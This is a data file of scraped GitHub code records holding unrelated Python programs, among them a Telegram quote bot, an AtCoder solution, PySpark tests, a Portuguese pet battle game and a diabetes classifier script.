Тот, в кого себя превратишь.'\r\n '\\n\\n- Джонни Деп')\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='Больше цитат')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'Если хотите больше цитат, то нажмите на '\r\n '\"Больше цитат\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == 'Деньги':\r\n photo = open('images/money.webp', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, '— И сколько же это будет стоить?'\r\n '\\n— Это бесплатно!'\r\n '\\n— Звучит дороговато.'\r\n '\\n\\n- Симпсоны')\r\n bot.send_message(message.chat.id, 'Для того, чтобы понять, что счастье не в деньгах, '\r\n 'нужно сперва узнать и то, и другое – счастье и деньги.'\r\n '\\n\\n- Фредрик Бегбедер')\r\n bot.send_message(message.chat.id, 'Не лажу с бытом! Деньги мешают мне и когда их нет, и когда они есть.'\r\n '\\n\\n- Фаина Раневская')\r\n bot.send_message(message.chat.id, 'Деньги нужно срочно пропить, так как потом их просто не будет...'\r\n '\\n\\n- Наруто')\r\n bot.send_message(message.chat.id, 'Это только кажется, что за всё платят деньгами. '\r\n 'За всё действительно важное платят кусочками души.'\r\n '\\n\\n- Дмитрий Емец')\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='Больше цитат')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'Если хотите больше цитат, то нажмите на '\r\n '\"Больше цитат\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == 'Мужественность':\r\n photo = open('images/success.webp', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, 'Всякий мужественный, всякий правдивый человек приносит честь '\r\n 'своей родине.'\r\n '\\n\\n- Роман Роллан')\r\n bot.send_message(message.chat.id, 'Мужчины любят быть более мужественными, чем тот, '\r\n 'с к��м они находятся вместе. '\r\n 'То же происходит с некоторыми женщинами.'\r\n '\\n\\n- Эрик Берн')\r\n bot.send_message(message.chat.id, 'Выбирая между гордостью и ответственностью, '\r\n 'мужчина почти всегда выберет гордость —'\r\n ' если ответственность отнимает его мужественность.'\r\n '\\n\\n- Стивен Кинг')\r\n bot.send_message(message.chat.id, 'Быть несгибаемым, как пень, помогут жизненные бури.'\r\n '\\n\\n- Геннадий')\r\n bot.send_message(message.chat.id, 'Боль – это пустяк. Поражение – тоже пустяк. '\r\n 'Очень скоро вы в этом убедитесь!'\r\n '\\n\\n- Эрин Хантер')\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='Больше цитат')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'Если хотите больше цитат, то нажмите на '\r\n '\"Больше цитат\"',\r\n reply_markup=markup_reply_life)\r\n\r\n\r\nbot.polling(none_stop=True, interval=0)\r\n","repo_name":"Kalnazar/QuoteTelegramBot","sub_path":"quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":40124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18325316381","text":"import sys\nimport math\nimport bisect\nfrom heapq import heapify, heappop, heappush\nfrom collections import deque, defaultdict, Counter\nfrom functools import lru_cache\nfrom itertools import accumulate, combinations, permutations\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\nMOD99 = 998244353\n\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\nSMI = lambda: input().split()\nSLI = lambda: list(SMI())\nEI = lambda m: [NLI() for _ in range(m)]\n\n\ndef main():\n N, M, K = NMI()\n S = SI()\n\n total = S.count(\"x\")\n # L[i]: 左からi個までxを変えられるときに何個oが続くか\n L = [N] * (total+1)\n cnt = 0\n for i, s in enumerate(S):\n if s == \"x\":\n L[cnt] = i\n cnt += 1\n\n if total * M == K:\n print(N * M)\n exit()\n\n # print(L)\n ans = 0\n x = 0\n for i, s in enumerate(S):\n tmp = 0\n if i == 0:\n k, r = divmod(K, total)\n tmp += k * N + L[r]\n\n elif S[i-1] == \"x\":\n k, r = divmod(K, total)\n if k >= M:\n continue\n if k == M-1:\n if r > total - x:\n continue\n\n if r < total - x:\n tmp = i + k * N + (L[x+r] - i) - i\n else:\n tmp = i + k * N + (N-i) + L[r-(total-x)] - i\n\n if s == \"x\":\n x += 1\n\n ans = max(ans, tmp)\n\n print(ans)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Mao-beta/AtCoder","sub_path":"ABC/ABC300/ABC300F.py","file_name":"ABC300F.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"35275867181","text":"def counter(days):\r\n years = int(days/365)\r\n days = days%365\r\n months = int(days/30)\r\n day = int(days%30)\r\n\r\n return years, months, day\r\n\r\nresult = counter(4000)\r\nprint(str(result[0])+ \" years, \"+ str(result[1])+ \" months and \"+ str(result[2])+ \" days\")\r\n","repo_name":"farhann-farooq/cse111_lab_sloves","sub_path":"Assignment 2/fn_8.py","file_name":"fn_8.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"3071743928","text":"\nimport pandas as pd\nimport numpy as np\nfrom config import *\n\ndef get_data(dir, file_name):\n \"\"\"\n :param dir: directory from which file is loaded\n :param file_name: file to load\n :return: dataset for drift detection, without irrelevant column, and\n with time column formatted as such.\n \"\"\"\n df = pd.read_csv(f'{dir}/{file_name}?raw=true')\n df['created_at'] = pd.to_datetime(df[TIME_COL])\n\n df = df.drop('order_id', axis=1)\n\n return df\n\ndef ohe(data, col_to_ohe):\n \"\"\"\n replace categorical columns with one hot encoded dataframe\n :param data: dataframe with categorical columns\n :param col_to_ohe: what column to transform\n :return: dataframe with ohe instead of categorical data\n \"\"\"\n return pd.get_dummies(data, columns=col_to_ohe)\n\n\ndef get_batch(data):\n \"\"\"\n Divides data into batches of samples within same time frame (TIME_COL).\n :param data: dataframe with time column.\n :return: input dataframe, with batch column added.\n \"\"\"\n data.sort_values(TIME_COL, inplace=False)\n data['batch'] = data.groupby(TIME_COL).cumcount() // BATCH_SIZE\n\n return data\n\n\ndef to_batch(cat_data, num_data):\n \"\"\"\n Aggregates data into one sample of time X batch.\n For categorical data, values are counted\n For numerical data, values are averaged\n :param cat_data: dataframe of categorical features. must include time and batch columns\n :param num_data: dataframe of numerical features. must include time and batch columns\n :return: one dataframe where each line is the aggregate measure of its time X batch\n \"\"\"\n\n batched_num = num_data.groupby([TIME_COL, 'batch'])\\\n .mean().reset_index()\n batched_cat = cat_data.groupby([TIME_COL, 'batch'])\\\n .sum().reset_index()\n\n batched = batched_num.merge(\n batched_cat,\n left_on=['batch', 'created_at'],\n right_on=['batch', 'created_at']\n )\n\n batched = batched.drop('batch', axis=1)\n\n return batched\n\n\ndef split_cat_num(data, CAT_FEATURES):\n \"\"\"\n :param data: dataframe of numerical and categorical features.\n :param CAT_FEATURES: categorical features to be split from numerical.\n names must be included in the columns of initial dataframe\n :return: 2 dataframes: categorical, and numeric\n \"\"\"\n\n cat_data = data[[TIME_COL, 'batch']+CAT_FEATURES]\n num_data = data.drop(CAT_FEATURES, axis=1)\n\n return cat_data, num_data\n\n\ndef split_date_data(data, time_col):\n \"\"\"\n :param data: dataframe of features to test for drift\n :param time_col: name of column in dataframe 'data' indexing time\n :return: 2 dataframes of features and their corresponding stream time\n \"\"\"\n\n dates = data[time_col]\n data = data.drop(time_col, axis=1)\n\n return dates, data\n\n\ndef editting(data):\n \"\"\"\n function to pipe some of our function in order to transform the data\n :param data: raw data\n :return: processed dataframe to feed to detector\n \"\"\"\n data = data.drop('score', axis=1)\n with_batches = get_batch(data)\n cat_data, num_data = split_cat_num(with_batches, CAT_FEATURES)\n oh_cat = ohe(cat_data, CAT_FEATURES)\n batched = to_batch(oh_cat, num_data)\n dates, data = split_date_data(batched, TIME_COL)\n return dates, data\n","repo_name":"DafnaKoby/home_test","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"42022268663","text":"class Repository(object):\n __default = None\n\n def __init__(self, default, **kwargs):\n self.__dict__ = default.__dict__\n\n for key in kwargs:\n setattr(self, key, kwargs.get(key))\n\n\nclass FactoryRepository(object):\n def __init__(self, **kwargs):\n for key in kwargs:\n setattr(self, key, kwargs.get(key))\n","repo_name":"willy182/super-sanic","sub_path":"src/shared/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"15760619273","text":"import cv2\nimport os\n\ninputDir = '/home/adeykin/projects/coloriser/timelaps/OVERFITcow_unet_nonBilinear'\noutputVideoPath = 'out.avi'\nout = cv2.VideoWriter(outputVideoPath, cv2.VideoWriter_fourcc('M','J','P','G'), 10, (224,224))\n\n\ndef readImages(path, index):\n i = 0\n while True:\n currentImgName = path + '/' + str(index) + '_' + str(i) + '.png'\n if not os.path.exists(currentImgName):\n return None\n yield cv2.imread(currentImgName)\n i += 10\n\n\nprint('hello')\nfor i in range(5):\n for img in readImages(inputDir, i):\n out.write(img)\nout.release()","repo_name":"Adeykin/imageColoriser","sub_path":"timelaps.py","file_name":"timelaps.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"32744361985","text":"\nWAKE_WORDS = ['hey computer', 'okay computer', 'hello adam'] # that's the list of wake words\nWAKE_WORDS_RESPONSE = ['hearing', 'hey boss', 'hello', \"i'm here\"] # that's the list of wake words\n\n# Greeting inputs\nGREETING_INPUTS = ['hi', 'hey', 'hello', 'greetings', \"what's up\"]\n\n# Greeting responses\nGREETING_RESPONSES = ['howdy', 'whats good', 'hello', 'hey there']\n\n# list of months\nMONTH_NAMES = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September',\n 'October', 'November', 'December']\n\n# list of ordinal numbers\nORDINAL_NUMBERS = ['1st', '2nd', '3rd', '4th', '5th', '6th', '7th', '8th', '9th', '10th',\n '11th', '12h', '13h', '14th', '15th', '16th', '17th', '18th', '19th', '20th',\n '21st', '22nd', '23rd', '24th', '25th', '26th', '27th', '28th', '29th', '30th' '31st']\n\n\n","repo_name":"mayrinkdotcom/adam","sub_path":"src/python/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"43265051426","text":"\"\"\"\n9 - Faça uma função que receba duas strings e retorne a intercalação letra a letra da primeira com a segunda string.\nA string intercalada deve ser retornada na primeira string.\n\"\"\"\n\n\ndef funcao(primeira, segunda):\n letras1 = []\n for x in range(len(primeira)):\n letras1.append(primeira[x])\n\n letras2 = []\n for x in range(len(segunda)):\n letras2.append(segunda[x])\n\n final = []\n if len(letras1) > len(letras2):\n for x in range(len(letras1)):\n final.append(letras1[x])\n if len(letras2) > x:\n final.append(letras2[x])\n elif len(letras1) < len(letras2):\n for x in range(len(letras2)):\n if len(letras1) > x:\n final.append(letras1[x])\n final.append(letras2[x])\n else:\n for x in range(len(letras1)):\n final.append(letras1[x])\n final.append(letras2[x])\n return ''.join(final)\n\n\nprint(funcao('Yr', 'ui'))\nprint(funcao('Eecco', 'xríi'))\nprint(funcao('Maçã', 'Banana'))\n","repo_name":"Yuri-Santiago/curso-udemy-python","sub_path":"Seção 8/Exercícios/atv09.py","file_name":"atv09.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"29183189257","text":"import argparse\nimport os\nimport textwrap\nimport tempfile\n\nimport pytest\n\nfrom sepelib.core import config\n\n\ndef test_key_value_parsing():\n wrong_values = [\n 'asddsd', # no '='\n '1aaaa=1111', # starts with number\n ',aaaa=1111', # starts with comma,\n 'aaaa aaaa=1111' # key has spaces\n ]\n for i in wrong_values:\n with pytest.raises(ValueError):\n config._parse_key_value(i)\n good_values = [\n ('_A=B', ('_A', 'B')),\n ('port=23333', ('port', '23333')),\n (' port=8080', ('port', '8080'))\n ]\n for input_, output in good_values:\n assert config._parse_key_value(input_) == output\n\n\ndef test_augment_args_parser():\n parser = argparse.ArgumentParser()\n config.augment_args_parser(parser)\n namespace = parser.parse_args(args=[])\n assert namespace.config_context == []\n namespace = parser.parse_args(['-V', 'key=value', '-V', 'key1=value1'])\n assert namespace.config_context == [('key', 'value'), ('key1', 'value1')]\n # Now check that error values fail\n with pytest.raises(SystemExit):\n parser.parse_args(['-V', '111=value'])\n\n\ndef test_config_patched_with_jinja():\n text = textwrap.dedent(\"\"\"\n run:\n production: false\n auth: true\n web:\n http:\n port: {{ port }}\n ip: 0.0.0.0\n \"\"\")\n defaults = textwrap.dedent(\"\"\"\n log:\n file_path: /usr/local/www/logs/google_borg_{{ port }}.log\n \"\"\")\n context = {\n 'port': '8080'\n }\n config_fd = defaults_fd = None\n config_file_name = defaults_file_name = None\n try:\n config_fd, config_file_name = tempfile.mkstemp()\n defaults_fd, defaults_file_name = tempfile.mkstemp()\n # Write config files\n os.write(config_fd, text)\n os.write(defaults_fd, defaults)\n\n config.load(config_file_name, defaults=defaults_file_name, config_context=context)\n assert config.get_value('web.http.port') == 8080\n assert config.get_value('log.file_path') == '/usr/local/www/logs/google_borg_8080.log'\n finally:\n if config_fd is not None:\n os.close(config_fd)\n if config_file_name:\n os.remove(config_file_name)\n if defaults_fd is not None:\n os.close(defaults_fd)\n if defaults_file_name:\n os.remove(defaults_file_name)\n\n\ndef test_get_context_from_env():\n with pytest.raises(ValueError):\n config.get_context_from_env(prefix=('SEPELIB', 'BSCONFIG'))\n\n env = {\n 'PATH': '/bin',\n 'SEPELIB_port': '8080',\n 'SEPELIB_logpath': '/usr/local/www/logs/sepelib-service.log'\n }\n context = {\n 'port': '8080',\n 'logpath': '/usr/local/www/logs/sepelib-service.log'\n }\n assert config.get_context_from_env(env_getter=lambda: env) == context\n bad_env = {\n 'SEPELIB_port': '8080',\n 'SEPELIB_log path': '/usr/local/www/logs/sepelib-service.log' # Has space in key\n }\n bad_context = {\n 'port': '8080'\n }\n with pytest.raises(ValueError):\n config.get_context_from_env(env_getter=lambda: bad_env)\n assert config.get_context_from_env(env_getter=lambda: bad_env, ignore_errors=True) == bad_context\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"infra/tests/test_core_config.py","file_name":"test_core_config.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"43906258741","text":"\"\"\"\ntest_main.py\n------------\nThis code piece is to test the functions and methods created for the pipeline\nTests have been written with Python unitest case methods. Using setUpClass and tearDown\n\"\"\"\n\nimport os\nimport sys\n\nROOT_DIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '../..'))\nsys.path.append(ROOT_DIR)\n\nimport unittest\nfrom utilities import helper\nfrom pyspark.sql.types import *\nfrom pyspark.sql import SparkSession\n\n\nclass SparkETLTestCase(unittest.TestCase):\n \"\"\"Test suite for extraction method\"\"\"\n\n @classmethod\n def setUpClass(self):\n\n os.environ['PYSPARK_PYTHON'] = sys.executable\n os.environ['PYSPARK_DRIVER_PYTHON'] = sys.executable\n\n self.spark = SparkSession.builder \\\n .appName(\"UnitTest\") \\\n .master(\"local[*]\") \\\n .getOrCreate()\n\n self.spark.sparkContext.setLogLevel(\"WARN\")\n\n @classmethod\n def tearDown(self):\n \"\"\"Stop Spark\"\"\"\n self.spark.stop()\n\n # This function is used to test the deduplication function in utilities.\n def test_dedup(self):\n\n #dummy dataset\n data = [\n (3794,\"United States\", 57, 'Other'),\n (3844,\"France\", 62, 'Female'),\n (3794,\"United States\", 57, 'Other'),\n (3844,\"France\", 62, 'Female')\n ]\n\n schema = StructType([\n StructField('customer_id', IntegerType(), True),\n StructField('country', StringType(), True),\n StructField('customer_age', IntegerType(), True),\n StructField('customer_gender', StringType(), True)\n ])\n\n input_df = self.spark.createDataFrame(data = data, schema = schema)\n\n # Define partition and order by columns\n partition_cols = [\"customer_id\"]\n order_by_cols = [\"customer_id\"]\n\n # Execute the dedup function\n result_df = helper.dedup(input_df, partition_cols, order_by_cols)\n\n # Define expected output DataFrame\n expected_data = [\n (3794,\"United States\", 57, 'Other'),\n (3844,\"France\", 62, 'Female')\n ]\n expected_df = self.spark.createDataFrame(data = expected_data, schema = schema)\n\n # Perform assertions on the result DataFrame\n self.assertEqual(sorted(expected_df.collect()), sorted(result_df.collect()))\n\n # This test is to check the transformation of currency conversion.\n def test_currency_conversion(self):\n # Create dummy input DataFrame\n data = [\n (1238, \"GBP\", \"USD\", '2020-02-16', 1.305168),\n (6392, \"GBP\", \"JPY\", '2020-02-16', 143.300879),\n (1239, \"GBP\", \"GBP\", '2020-02-16', 1.0),\n (1237, \"GBP\", \"EUR\", '2020-02-16', 1.203874)\n ]\n\n schema = StructType([\n StructField('exchange_rate_id', IntegerType(), True),\n StructField('from_currency', StringType(), True),\n StructField('to_currency', StringType(), True),\n StructField('effective_date', StringType(), True),\n StructField('rate', DoubleType(), True)\n ])\n\n input_df = self.spark.createDataFrame(data = data, schema = schema)\n\n # Define the currency to convert to\n to_currency = \"USD\"\n\n # Execute the currency_conversion function\n result_df = helper.currency_conversion(input_df, to_currency)\n result_df.show()\n\n # Define expected output DataFrame\n expected_data = [\n (\"2020-02-16\", \"USD\", \"USD\", 1.0),\n (\"2020-02-16\", \"JPY\", \"USD\", 0.009),\n (\"2020-02-16\", \"GBP\", \"USD\", 1.305),\n (\"2020-02-16\", \"EUR\", \"USD\", 1.084)\n ]\n\n expected_df = self.spark.createDataFrame(expected_data,\n [\"effective_date\", \"from_currency\", \"to_currency\", \"rate\"])\n\n # Perform assertions on the result DataFrame\n self.assertEqual(sorted(expected_df.collect()), 
sorted(result_df.collect()))\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"agrawaltejas/pyspark_project","sub_path":"src/tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"72055818321","text":"import random\n\ngelo = 9\nfogo = 8\ntrovao = 8\nacido = 5\nraio = 7\nagua = 5\ngrama = 3\nsombra = 2\nlama = 1\n\n#--------Arrays--------\n#Pets = [0nome, 1vida, 2nivel, 3experiencia, 4Golpe1, 5Golpe2, 6Texto do Golpe, 7Texto do Golpe2]\nblits = [\"Blits\",40,0,0,raio,agua,\"raio\",\"agua\"]\nres = [\"Res\",40,0,0,lama,grama,\"lama\",\"grama\"]\ncardolv = [\"Cardolv\",40,0,0,sombra,lama,\"sombra\",\"acido\"]\nbyray = [\"Byray\",40,2,0,trovao, gelo,\"trovao\",\"gelo\"]\n\ntodos_pets = [blits,res,cardolv,byray]\nbanco_pet = []\nmeus_pets = [blits]\n\n#-------dados do player\ngold = 10\nPetbola = 2\npocao = 0\nbolsa = [gold,meus_pets,Petbola,pocao]\n#----------------\n#Vamos usar uma variavel como contador para limitar em até 5 pets que pode levar no bolso\nqtd_maxima_pets_na_bolsa = 1\n\nfimdejogo = False\n\naleatorio = random.randint(0, 3) #de 0 a 2\n\n \ndef comprar():\n while True:\n \n print(\"-----------\\nBem vindo a loja de itens\\n Você tem\",bolsa[0],\"de gold\")\n item = input(\"Os itens disponiveis para compra são:\\nPetbola(5 gold)\\nPocao(10 gold)\\nPara sair digite: sair\\nO que deseja comprar? \")\n if item == \"Petbola\" and bolsa[0] >= 5:\n bolsa[2] += 1\n bolsa[0] -= 5\n print(\"-----------\\n1x Petbola comprado\\nVocê tem\",bolsa[0],\"de gold\")\n \n \n elif(item == \"Pocao\" and bolsa[0] >= 10):\n bolsa[3] += 1\n bolsa[0] -= 10\n print(\"-----------\\n1x Pocao comprado (Ela recupera 10 pontos de vida)\\nVocê tem\",bolsa[0],\"de gold\")\n \n elif(item == \"sair\"):\n break\n else:\n print(\"Gold Insuficiente\\n\")\n \ndef bancopet():\n while True:\n opcao_banco = input(\"Computador ligado,\\nDigite a opção desejada:\\ndepositar pet\\nsacar pet\\nsair\\n\")\n if(opcao_banco == \"sair\"):\n break\n \n elif(opcao_banco == \"depositar pet\"):\n if(qtd_maxima_pets_na_bolsa <= 1):\n print(\">>>Você deve ter pelo menos 1 pet na sua bolsa!\") \n break\n else:\n print(\"Seus Pets na sua bolsa:\\n\",meus_pets)\n posicao = int(input(\"\\nPara depositar, digite a posição do pet na sua bolsa\\nExemplo:Se for o primeiro digite 0, se for o segundo digite 1...\\n\"))\n banco_pet.append(meus_pets[posicao])#adicionando o pet no banco\n meus_pets.pop(posicao) #removendo pet da bolsa\n print(\"Pet Depositado\\nPets em sua bolsa:\")\n print(meus_pets)\n qtd_maxima_pets_na_bolsa -= 1\n \n \n elif(opcao_banco == \"sacar pet\"):\n if(qtd_maxima_pets_na_bolsa >= 5):\n print(\">>>Qantidade maxima de pets na bolsa é 5\") \n break\n else:\n print(\"Seus Pets na sua bolsa:\\n\",meus_pets)\n print(\"Seus Pets no banco:\\n\",banco_pet)\n posicao_banco = int(input(\"\\nPara sacar, digite a posição do pet no banco\\nExemplo:Se for o primeiro digite 0, se for o segundo digite 1...\\n\"))\n meus_pets.append(banco_pet[posicao_banco])#adicionando o pet no banco\n banco_pet.pop(posicao_banco) #removendo pet da bolsa\n print(\"Pet Sacado\\nPets em sua bolsa:\")\n print(meus_pets)\n qtd_maxima_pets_na_bolsa += 1 \n \n\ndef explorar():\n oponente = todos_pets[aleatorio]\n print(\"\\n-----------------\\nVocê explora a floresta e de repente encontra um pet selvagem\")\n print(\"Você encontrou o pet:\",oponente[0])\n print(\"\\nSeus pets\",meus_pets)\n posicao_batalha = int(input(\"Escolha um pet para batalha! 
Digite a posição do pet no banco\\nExemplo:Se for o primeiro digite 0, se for o segundo digite 1...\\n\"))\n petembatalha = meus_pets[posicao_batalha]\n print(\"\\n-----------------\\nPet selecionado:\",petembatalha,\"\\n-----------------\\n\")\n \n while oponente[1] > 0:\n petembatalha[1] = petembatalha[1] - oponente[4]\n print(\">>>Pet oponente usou\",oponente[6],\"e te causou \",oponente[4],\"de dano\")\n print(\">Sua vida\",petembatalha[1],\"vida do oponente\",oponente[1])\n print(\"-----\\nSeus golpes são:\\n\",petembatalha[6],\"\\n\",petembatalha[7],\"\\n-----\\n\")\n escolha = input(\"Digite o golpe que deseja utilizar: \")\n \n if(escolha == petembatalha[6]):\n oponente[1] = oponente[1] - petembatalha[4]\n print(\"\\n>>>você usou\",petembatalha[6],\"e causou\",petembatalha[4],\"de dano no pet opnonente<<<\\n\")\n \n \n elif(escolha == petembatalha[7]):\n oponente[1] = oponente[1] - petembatalha[5]\n print(\"\\n>>>você usou\",petembatalha[7],\"e causou\",petembatalha[5],\"de dano no pet opnonente<<<\\n\")\n \n else:\n print(\"Vê digitou algo errado\\n\")\n \n #repeti o codigo para o adversario usar um golpe diferente desta vez\n petembatalha[1] = petembatalha[1] - oponente[5]\n print(\">>>Pet oponente usou\",oponente[7],\"e te causou \",oponente[4],\"de dano\")\n print(\">Sua vida\",petembatalha[1],\"vida do oponente\",oponente[1])\n print(\"-----\\nSeus golpes são:\\n\",petembatalha[6],\"\\n\",petembatalha[7])\n escolha = input(\"Digite o golpe que deseja utilizar: \")\n \n if(escolha == petembatalha[6]):\n oponente[1] = oponente[1] - petembatalha[4]\n print(\"\\n>>>você usou\",petembatalha[6],\"e causou\",petembatalha[4],\"de dano no pet oponente<<<\\n\")\n \n \n elif(escolha == petembatalha[7]):\n oponente[1] = oponente[1] - petembatalha[5]\n print(\"\\n>>>você usou\",petembatalha[7],\"e causou\",petembatalha[5],\"de dano no pet opnonente<<<\\n\")\n \n else:\n print(\"Vê digitou algo errado\\n\")\n \n petembatalha2 = petembatalha\n if(petembatalha2[1] <= 0):\n fimdejogo = True\n\n else:\n print(\"\\n>>>>>Você ganhou +2 de experiencia<<<<<\")\n petembatalha2[3] += 2\n if(petembatalha2[3] >= 10):\n petembatalha2[3] = 0\n petembatalha2[2] += 1\n print(\"Seu pet\",petembatalha2[0],\"Subiu de nivel.\\nNivel atual:\",petembatalha2[3])\n if(bolsa[2] <= 0):\n print(\"Você não possui Petbolas suficiente, compre mais na loja\")\n meus_pets[posicao_batalha] = petembatalha2\n else:\n escolha = input(\"Vocês deseja tentar capturar este Pet? 
Digite sim ou nao: \")\n if(escolha == \"sim\"):\n bolsa[2] -= 1\n print(\"Você lançou uma Petbola\")\n tentasorte = random.randint(0, 1)\n if(tentasorte == 1):\n print(\"Você conseguiu capturar o Pet\")\n meus_pets[posicao_batalha] = petembatalha2\n if(qtd_maxima_pets_na_bolsa >= 5):\n print(\"Você atingiu o limite maximo de 5 pets na bolsa,o pet capturado foi transferido para o banco\")\n banco_pet.append(oponente)\n print(oponente[0],\"capturado foi adicionado ao Banco Pet\\n\")\n meus_pets[posicao_batalha] = petembatalha2\n else:\n meus_pets.append(oponente)\n meus_pets[posicao_batalha] = petembatalha2\n qtd_maxima_pets_na_bolsa += 1\n \n else:\n print(\"O Pet fugiu e você não conseguiu captura-lo, tente novamente outra vez\")\n meus_pets[posicao_batalha] = petembatalha2\n \n\ndef curarpet():\n print(\"Seus Pets na sua bolsa:\\n\",meus_pets)\n posicao_curar = int(input(\"\\nPara curar, digite a posição do pet na sua bolsa\\nExemplo:Se for o primeiro digite 0, se for o segundo digite 1...\\n\"))\n petparacurar = meus_pets[posicao_curar]\n petparacurar[1] = 40\n print(\"Vida do\",petparacurar[0],\"restaurada para 40 de vida\")\n meus_pets[posicao_curar] = petparacurar\n\n\nwhile True:\n if(fimdejogo == True):\n break\n else:\n opcao = input(\"Digite uma das seguintes opções: bolsa, explorar, petshop, ajuda :\")\n \n if(opcao == \"ajuda\"):\n print(\"--------------\\nSempre digite a opção \\nExplorar: Para procurar um pet selvagem\\nPetshop: local com diversas funções\\n--------------\")\n \n elif(opcao == \"petshop\"):\n opcao2 = input(\"\\nBem vindo ao Petshop digite uma das opções: comprar, bancopet, curar pet, sair: \")\n if opcao2 == \"comprar\":\n comprar()\n elif opcao2 == \"bancopet\":\n bancopet()\n \n elif opcao2 == \"curar pet\":\n curarpet()\n \n else:\n print(\"Saindo do Petshop\")\n \n elif opcao == \"bolsa\":\n print(\"-----------\\nSua bolsa contém os seguinte itens:\")\n print(\"Gold:\",bolsa[0],\"\\nSeus Pets:\",bolsa[1],\"\\nPetbolas:\",bolsa[2],\"\\nPocoes:\",bolsa[3],\"\\n-----------\\n\")\n \n elif(opcao == \"explorar\"):\n explorar()\n\n\n#Desenvolvido por Leonardo Luis Mascarenhas\n\n\n\n","repo_name":"Leotrevi/Petworld","sub_path":"pet-world-4.py","file_name":"pet-world-4.py","file_ext":"py","file_size_in_byte":9280,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39051083032","text":"from setuptools import setup\nfrom setuptools.command.install import install\n\n\nURL = \"http://dev.dataiku.com/~cstenac/dev-recruiting/us-census.db.gz\"\nLOCAL = \"resources/us-census.db.gz\"\nLOCAL_EXTRACT = \"resources/us-census.db\"\n\nclass MyInstall(install):\n def run(self):\n install.run(self)\n import urllib\n urllib.urlretrieve(URL, LOCAL)\n from subprocess import call\n call(['gunzip', LOCAL])\n\nconfig = {\n 'description': 'A web application querying a database',\n 'author': u'Sébastien Diemer',\n 'url': 'https://github.com/sebdiem/webapp',\n 'download_url': 'https://github.com/sebdiem/webapp',\n 'author_email': 'diemersebastien@yahoo.fr',\n 'version': '0.1',\n 'install_requires': ['flask'],\n 'packages': ['webapp'],\n 'scripts': [],\n 'name': 'webapp',\n 'cmdclass': {'install': MyInstall}\n}\n\nsetup(**config)\n","repo_name":"sebdiem/webapp","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"71436293520","text":"import joblib\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\n\n\ndf = pd.read_csv('diabetes_prediction_dataset.csv')\n# print(df.head())\n# print(df.tail())\n# print(df.shape)\n# print(df.info())\n# print(df.describe())\n# print(df.isnull())\n\ngender_map = {'Female': 0.0, 'Male': 1.0, 'Other': 2.0}\ndf['gender'] = df['gender'].map(gender_map)\n\nsmoking_map = {'never': 0.0, 'current': 1.0, 'former': 2.0, 'No Info': 3.0, 'not current': 4.0, 'ever': 5.0}\ndf['smoking_history'] = df['smoking_history'].map(smoking_map)\ndf = df.astype(float)\n\n# missing_values = df.isnull().sum()\n# print(missing_values)\n\nfeature_names = df.columns.tolist()\ncolumn_to_drop = 'diabetes'\nif column_to_drop in feature_names:\n feature_names.remove(column_to_drop)\n# print(feature_names)\n\n#split dataset\nx = df.drop('diabetes', axis='columns')\ny = df['diabetes']\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=10000)\ny_train = np.ravel(y_train)\n\nx_train_df = pd.DataFrame(x_train, columns=feature_names)\nx_test_df = pd.DataFrame(x_test, 